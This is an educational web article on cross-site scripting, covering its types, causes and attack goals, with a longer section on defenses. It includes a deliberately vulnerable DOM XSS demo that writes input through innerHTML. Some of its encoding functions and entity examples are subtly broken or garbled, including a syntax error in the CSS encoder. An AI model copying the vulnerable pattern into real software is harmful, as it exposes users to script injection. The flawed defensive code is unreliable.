Detailed Explanation of XSS Cross-Site Scripting Attacks (Including Attack Methods and Defense Techniques)

Time： 2024-09-29 Column：Security views：900

Cross-Site Scripting (XSS) is a prevalent security vulnerability that can compromise web applications, allowing attackers to inject malicious scripts. Understanding XSS is crucial for safeguarding sensitive data and maintaining user trust in online platforms.

1. Overview of XSS

People often abbreviate Cross-Site Scripting as CSS, but this can be confused with Cascading Style Sheets (CSS). Therefore, Cross-Site Scripting is abbreviated as XSS.

XSS (Cross-Site Scripting) is a security vulnerability attack on web applications. XSS attacks typically exploit vulnerabilities left in the development of web pages to inject malicious code into the page, causing users to load and execute malicious scripts created by attackers.

These malicious scripts are usually written in JavaScript but can also include Java, VBScript, ActiveX, Flash, or even plain HTML. Once the attack succeeds, attackers can gain access to various information, such as higher privileges (e.g., executing certain actions), sensitive web content, session data, and cookies.

Cross-Site Scripting (XSS) is one of the most common web application security vulnerabilities. These vulnerabilities allow attackers to embed malicious script code into pages that regular users will access. When users visit the page, the malicious script is executed, leading to an attack on the user.

Attackers can execute pre-defined malicious scripts in the user’s browser, which can result in serious consequences such as session hijacking, inserting malicious content, redirecting users, using malware to hijack the user's browser, spreading XSS worms, or even damaging websites and altering router settings.

XSS vulnerabilities date back to the 1990s. Many websites, including Twitter, Facebook, MySpace, Orkut, Sina Weibo, and Baidu Tieba, have been either attacked or found to have XSS vulnerabilities. Studies show that in recent years, XSS attacks have surpassed buffer overflows as the most common attack method, with 68% of websites potentially vulnerable. According to statistics from the Open Web Application Security Project (OWASP) in 2010, XSS ranked second among the top 10 web security threats, just behind injection attacks.

XSS attacks have two main components:

The attacker submits malicious code.
The browser executes the malicious code.

The key point of XSS is not cross-site functionality but the script-based attack.

2. Principles

HTML is a markup language that treats certain characters in a special way to distinguish between text and markup. For example, the less-than sign (<) is considered the start of an HTML tag, and the characters inside the tag may represent a page title or other content.

When content with special characters (such as <) is inserted into a dynamic page, the user's browser may mistakenly interpret it as HTML tags. If these HTML tags include a JavaScript script, the script will be executed in the user's browser. Therefore, if dynamic pages do not properly check or sanitize special characters, XSS vulnerabilities can arise.

3. Characteristics

XSS attacks have the following characteristics: strong concealment and ease of initiation.

Compared to phishing attacks, XSS attacks cause more severe harm, with the following traits:

XSS attacks are executed within the application the user is currently using, meaning users will see personalized information, such as account details or "Welcome Back" messages, which cloned websites cannot display.
Phishing websites used in attacks are often quickly shut down once discovered.
Many browsers and security software products include built-in phishing filters to block access to malicious cloned sites.
If a user falls victim to a cloned web banking site, the bank usually bears no responsibility. However, if a user is attacked through an XSS vulnerability in a banking application, the bank cannot easily avoid responsibility.

4. Types

Based on how the attack code operates, XSS can be divided into three types:

Persistent XSS: The most direct and harmful type, where the attack code is stored on the server (e.g., in a database).
Non-persistent XSS: The most common type, where the user accesses the server, which reflects the attack code back to the user's browser. This type does not involve the database.
DOM-based XSS: This type results from client-side script processing logic flaws. The malicious script is executed by manipulating the Document Object Model (DOM) of the page locally.

4.1 Non-persistent XSS

Reflected XSS is a simple form of attack where user input is reflected back to the user’s browser. To exploit this vulnerability, an attacker must trick the user into visiting a carefully crafted URL (malicious link).

Reflected XSS commonly occurs in features like search functions. The user must click a specific link for the attack to be triggered. However, it is less harmful than persistent XSS as it is affected by defense mechanisms like Chrome's built-in XSS Auditor or NoScript.

Detailed Explanation of XSS Cross-Site Scripting Attacks (Including Attack Methods and Defense Techniques)

Attack Process:

The attacker tricks the user into clicking a malicious link.
The user input or some user-controlled parameter is not properly sanitized before being output to the page, leading to the vulnerability.

Vulnerability Causes:

Inserting untrusted data into HTML tags (e.g., div, p, td).
Inserting untrusted data into HTML attributes (e.g., <div width=$INPUT></div>).
Inserting untrusted data into JavaScript code (e.g., <script>var message = "$INPUT";</script>).
Inserting untrusted data into style attributes.
Inserting untrusted data into HTML URLs (e.g., <a href="http://www.abcd.com?param=$INPUT"></a>).

If proper prevention measures are not implemented on the server or client side, these scenarios can lead to XSS vulnerabilities.

4.2 Persistent Cross-Site Scripting (XSS)

Stored (or HTML Injection/Persistent) XSS attacks are most common on community-driven websites or webmail sites and do not require special links to execute. Hackers simply need to submit the XSS exploit code (unlike reflected XSS, which is usually embedded in the URL) to a location on a website that other users may access. These areas could include blog comments, user reviews, message boards, chat rooms, HTML emails, wikis, and many other places.

Once a user accesses the infected page, the execution is automatic. The attack process is as follows:

Detailed Explanation of XSS Cross-Site Scripting Attacks (Including Attack Methods and Defense Techniques)

Vulnerability Cause: The cause of a stored XSS vulnerability is similar to that of reflected XSS. However, in this case, the malicious code is stored on the server, leading to its execution when other users (front-end) or administrators (front and back-end) access the resource. The user accesses the server, the cross-site link is returned, and the malicious code is executed.

4.3 DOM-based Cross-Site Scripting (DOM XSS)

DOM-based XSS refers to an XSS attack that occurs by modifying the page's DOM (Document Object Model).

Attack Example: In the following code, the submit button's onclick event calls the xsstest() function. In xsstest(), the DOM node of the page is modified, writing user input as HTML to the page via innerHTML, which results in a DOM-based XSS attack.

<html>
    <head>
        <title>DOM Based XSS Demo</title>
        <script>
        function xsstest() {
        var str = document.getElementById("input").value;
        document.getElementById("output").innerHTML = "<img
        src='"+str+"'></img>";
        }
        </script>
    </head>
    <body>
    <div id="output"></div>
    <input type="text" id="input" size=50 value="" />
    <input type="button" value="submit" onclick="xsstest()" />
    </body>
</html>

Vulnerability Cause: DOM-based XSS is rooted in the DOM (Document Object Model) structure of the browser. With the standardization of this technology, JavaScript can easily access the DOM. When a DOM-based XSS vulnerability is identified in client-side code, a user can be tricked (phished) into accessing a specially crafted URL. The exploitation steps are similar to those of reflected XSS, but the key difference is that the URL parameters are not sent to the server, allowing the attack to bypass Web Application Firewalls (WAF) and evade server-side detection.

5. Attack Methods

Common XSS attack techniques and objectives include:

Stealing cookies to obtain sensitive information.
Using embedded Flash to gain higher permissions through cross-domain settings or similar operations using Java.
Executing administrative actions (or common actions like posting on social media, adding friends, or sending private messages) on behalf of the (attacked) user by leveraging iframes, frames, XMLHttpRequests, or Flash.
Requesting unauthorized actions in a trusted domain using the trust between domains, such as rigging votes in a voting activity.
Using XSS on high-traffic pages to attack smaller websites, potentially leading to a DDoS attack.

6. Defense Methods

6.1 Signature-Based Defense

XSS vulnerabilities, much like the well-known SQL injection vulnerability, exploit incomplete web page coding. Each vulnerability targets a different weakness, making it difficult to defend against XSS using a single signature.

Traditional XSS defenses typically rely on signature matching, where the keyword "javascript" is checked in submitted data. However, this approach lacks flexibility. Any submission containing "javascript" might be falsely flagged as an XSS attack.

6.2 Code-Based Defense

Web developers often make errors that result in vulnerabilities. XSS attacks take advantage of these, so a more effective approach is to improve web application development to reduce vulnerabilities and avoid attacks:

Filter user-submitted data by validating URL formats, HTTP headers, and POST data, ensuring the content follows specific formats and lengths.
Implement session tokens, CAPTCHA systems, or HTTP referrer header checks to prevent functionality from being executed by third-party websites.
Ensure received content is properly sanitized, allowing only minimal, secure tags (excluding JavaScript), removing any external content references (especially stylesheets and JavaScript), and using HTTP-only cookies.

While such practices reduce the usability of web systems, they enforce stricter interaction constraints, suitable primarily for content publishing sites. However, since most web developers lack formal security training, completely avoiding XSS vulnerabilities can be challenging.

6.2.1 XSS Defense via HTML Encoding

Scope: Use HTML encoding when inserting untrusted data into HTML tags (e.g., div, span).

Encoding Rules: Escape characters &, <, >, ", ', / as HTML entities (or decimal/hexadecimal).

Example Code:

function encodeForHTML(str, kwargs){     return ('' + str)
 
      .replace(/&/g, '&amp;')
 
      .replace(/</g, '&lt;')     // DEC=> &#60; HEX=> &#; Entity=> &lt;
 
      .replace(/>/g, '&gt;')
 
      .replace(/"/g, '&quot;')
 
      .replace(/'/g, '&#x27;')   // &apos; 不推荐，因为它不在HTML规范中
 
      .replace(/\//g, '&#x2F;');
 
  };

HTML offers three encoding formats: decimal, hexadecimal, and named entities. For example, the less-than sign (<) can be encoded as decimal <, hexadecimal &#;, or named entity <. For single quotes ('), hexadecimal encoding is preferred since named entities are not part of the HTML specification.

6.2.2 XSS Defense via HTML Attribute Encoding

Scope: Apply HTML attribute encoding when inserting untrusted data into HTML attributes (excluding src, href, style, and event handlers).

Encoding Rules: Escape all characters with an ASCII value below 256 (except alphanumeric characters) using &#xHH; or an available named entity.

Example Code:

function encodeForHTMLAttibute(str, kwargs){
    let encoded = ''
    for(let i = 0; i < str.length; i++) {       
        let ch = hex = str[i]     
        if (!/[A-Za-z0-9]/.test(str[i]) && str.charCodeAt(i) < 256) {         
            hex = '&#x' + ch.charCodeAt(0).toString(16) + ';'
        }
        encoded += hex
    }
    return encoded
}

6.2.3 XSS Defense through JavaScript Encoding

Scope: JavaScript encoding is applied when inserting untrusted data into event handler attributes or JavaScript values.

Encoding Rules: Use the xHH format to escape all characters with ASCII codes below 256, except for alphanumeric characters.

Example Code:

function encodeForJavascript(str, kwargs) {     
    let encoded = '';     
    for(let i = 0; i < str.length; i++) {       
        let cc = hex = str[i];       
        if (!/[A-Za-z0-9]/.test(str[i]) && str.charCodeAt(i) < 256) {         
            hex = '\\x' + cc.charCodeAt().toString(16);
 
        }
        encoded += hex;
    }
    return encoded;   
};

6.2.4 XSS Defense through URL Encoding

Scope: When untrusted data is used as URL parameter values, URL encoding should be applied.

Encoding Rules: Apply encodeURIComponent to encode the parameter values.

Example Code:

function encodeForURL(str, kwargs){     
    return encodeURIComponent(str);   
};

6.2.5 XSS Defense through CSS Encoding

Scope: CSS encoding is applied when untrusted data is used within CSS.

Encoding Rules: Use the XXXXXX format to escape all characters with ASCII values below 256, except for alphanumeric characters.

Example Code:

function encodeForCSS (attr, str, kwargs){     
    let encoded = '';     
    for (let i = 0; i < str.length; i++) {       
        let ch = str.charAt(i);       
        if (!ch.match(/[a-zA-Z0-9]/) {         
            let hex = str.charCodeAt(i).toString(16);         
            let pad = '000000'.substr((hex.length));         
            encoded += '\\' + pad + hex;
        } else {         
            encoded += ch;
        }     
    }
    return encoded;
};

At all times, user input should be considered untrusted. For HTTP parameters, validation should be applied, for example, an enum type field should not accept values outside the enum. Any output involving untrusted data should be properly encoded.

XSS vulnerabilities can be difficult to detect, but frameworks like React and Vue now incorporate XSS defense mechanisms at the framework level, which alleviates some of the burden. However, developers must still be familiar with the basics of XSS to avoid creating vulnerabilities in the first place. Frameworks are tools, but proper development practices and heightened security awareness are essential to keeping web front-ends secure.

6.3 Client-Side Layered Defense Strategy

The client-side cross-site scripting (XSS) layered defense strategy is based on a security model that allocates independent threads and implements layered defense strategies. This model is primarily implemented on the client side (browser), which distinguishes it from other models. Client-side security is crucial as it determines which server information to execute, making XSS defense easier. The model consists of three main components:

A “webpage thread analysis module” that allocates an independent thread for each webpage and analyzes resource consumption.
A user input analysis module containing four rules of the layered defense strategy.
An XSS information database that stores data about malicious XSS websites on the internet.

XSS attacks often arise due to program vulnerabilities, and the complete prevention of XSS vulnerabilities relies heavily on the programmer's skill and security awareness. However, following secure software development processes and certain programming principles can greatly reduce the occurrence of XSS vulnerabilities. These principles include:

Do not trust any user-submitted content. All user-submitted data should be subject to reliable input validation, including URL, query keywords, HTTP headers, REFERRER, and POST data. Only accept content that falls within the expected length, format, and characters. Use POST over GET for form submissions whenever possible, and filter characters like <, >, ;, and " from the input. Any content output to the page should be encoded to avoid unintentionally rendering HTML tags.
Implement session tokens, CAPTCHA systems, or HTTP referer header checks to prevent third-party websites from executing functions. For user-submitted elements like images or links, check for suspicious behavior such as redirection back to the site or non-image URLs.
Prevent cookie theft. Avoid exposing sensitive information such as email addresses or passwords directly in cookies. Bind cookies to the system’s IP address to reduce the risk of replay attacks after cookie exposure. This ensures that cookies stolen by attackers cannot be easily reused.
Ensure that received content is properly sanitized and only includes minimal and secure tags (excluding JavaScript). Remove any references to remote content (especially stylesheets and JavaScript) and use HTTP-only cookies.

6.4 Other Types of XSS Prevention

While careful escaping when rendering pages and executing JavaScript can prevent XSS, solely relying on strict development practices is insufficient. Below are some general strategies that can help mitigate the risks and impacts of XSS:

CSP: Content Security Policy
A strict Content Security Policy (CSP) can help in XSS prevention by:

Prohibiting the loading of external scripts, thus preventing complex attack logic.
Blocking external submissions, ensuring that user data won't be leaked to external domains even if the site is compromised.
Disabling inline script execution (this is strict; GitHub is an example of a site that employs this rule).
Blocking unauthorized script execution (this is a new feature, used in Google Maps mobile).
Properly configuring CSP reporting allows for timely detection of XSS attempts and swift remediation.

Input Length Restrictions
Enforce a reasonable length limit on all untrusted input. While this won't prevent XSS entirely, it can make exploitation more difficult.
Other Security Measures

HTTP-only cookies: These prevent JavaScript from accessing sensitive cookies, so attackers cannot steal them even after successfully injecting XSS.
CAPTCHA: Helps prevent scripts from submitting dangerous actions on behalf of users.

💰 Support Us